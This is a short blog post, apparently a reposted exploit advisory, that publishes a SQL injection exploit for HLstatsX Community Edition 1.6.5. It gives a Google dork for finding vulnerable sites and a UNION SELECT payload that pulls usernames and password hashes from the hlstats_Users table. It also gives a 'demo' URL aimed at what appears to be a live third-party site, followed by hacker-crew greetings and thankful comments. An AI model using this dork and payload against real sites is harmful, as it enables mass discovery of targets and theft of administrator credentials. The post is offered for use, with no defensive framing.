HLstatsX Community Edition 1.6.5 SQL Injection Vulnerability

#############################################################
# HLstatsX Community Edition 1.6.5 SQL Injection Vulnerability

# Plugin Home: http://www.hlxcommunity.com/

# Author: BAYBORA

# Site: www.1923turk.com

##############################################################

Google Dork: “hlstats.php?mode=”

# Exploit: xxxxx.com/xxx/hlstats.php?mode=dailyawardinfo&award==[SQL-inj]

# -99+union+select+1,2,concat(username,0x3a,password)

,4+from+hlstats_Users–&game=css

# Demo: http://hlstatsx.eu/hlstats.php?mode=dailyawardinfo&award=-99+union+select+1,2,concat(username,0x3a,password)

,4+from+hlstats_Users–&game=css

~~~~Yerinde sayanlar,Yürüyenlerden cok gürültü yaparlar!~~~~

##############################################################
# Greetz: Manas58 – Gamoscu – Delibey – Tiamo – Psiko – Turco – infazci – X-TRO
##############################################################

2 responses to this post.

  1. Nice bro,,,,, thanks !! ^^

    Cevapla

  2. Posted by wolf-system on 23 Eylül 2010 at 15:35

    thanks ; )

    Cevapla

Yorum yapın

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Değiştir )

Twitter picture

You are commenting using your Twitter account. Log Out / Değiştir )

Facebook photo

You are commenting using your Facebook account. Log Out / Değiştir )

Connecting to %s

Follow

Get every new post delivered to your Inbox.